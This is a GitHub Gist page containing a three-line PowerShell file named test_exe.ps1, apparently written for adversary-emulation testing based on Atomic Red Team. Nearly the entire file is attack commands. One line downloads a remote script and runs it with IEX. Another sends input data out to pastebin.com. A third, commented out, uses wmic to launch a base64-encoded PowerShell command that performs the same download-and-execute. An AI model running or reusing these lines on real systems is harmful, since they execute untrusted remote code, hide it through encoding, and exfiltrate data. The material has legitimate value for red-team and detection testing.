Last active
November 20, 2019 14:26
-
-
Save karmatr0n/d59087653ac8df5d459c65badb7546b4 to your computer and use it in GitHub Desktop.
test_exe.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
IEX((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1')) | |
IEX((New-Object System.Net.WebClient).UploadString('https://pastebin.com', $Input)) | |
# wmic process call create "powershell -encodedCommand SQBFAFgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwByAGUAZABjAGEAbgBhAHIAeQBjAG8ALwBhAHQAbwBtAGkAYwAtAHIAZQBkAC0AdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AYQB0AG8AbQBpAGMAcwAvAFQAMQAwADgANgAvAHAAYQB5AGwAbwBhAGQAcwAvAHQAZQBzAHQALgBwAHMAMQAnACkAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADUAOwA=" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment